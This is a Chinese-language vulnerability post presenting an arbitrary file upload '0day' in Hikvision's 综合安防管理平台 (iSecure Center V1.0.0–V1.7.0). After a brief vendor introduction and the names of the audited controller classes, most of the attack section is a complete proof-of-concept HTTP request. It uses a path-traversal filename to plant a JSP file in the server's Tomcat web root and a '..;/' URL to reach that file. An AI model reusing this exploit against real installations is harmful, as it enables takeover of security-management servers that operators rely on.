【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

漏洞编号：

海康威视（Hikvision）是一家总部位于中国杭州的公司，是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机，海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案，包括视频监控、入侵检测、访客管理、停车场管理等。

HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞，攻击者通过构造特殊的请求包可以上传任意文件，获取服务器权限。

②iSecure Center V1.0.0 - V1.7.0

系统登录页面

源代码审计

WEB-INF/classes/com/hikvision/svm/controller/ExternalController.class

WEB-INF/classes/com/hikvision/svm/business/serivce/impl/ExternalBusinessServiceImpl.class

构造请上传文件 (通过 env泄漏获取绝对路径，路径一般不会修改)

POST /svm/api/external/report HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%out.print("test");%>
------WebKitFormBoundary9PggsiM755PLa54a--

通过BP验证

/portal/ui/login/..;/..;/new.jsp